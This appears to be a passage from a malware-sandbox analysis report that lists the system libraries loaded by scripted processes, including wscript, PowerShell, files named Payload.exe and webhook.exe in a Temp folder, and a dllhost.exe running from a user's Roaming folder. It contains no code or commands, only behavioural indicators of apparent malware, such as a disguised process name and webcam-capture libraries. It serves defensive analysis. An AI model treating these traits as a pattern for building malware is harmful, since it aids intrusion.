Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dlnashext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
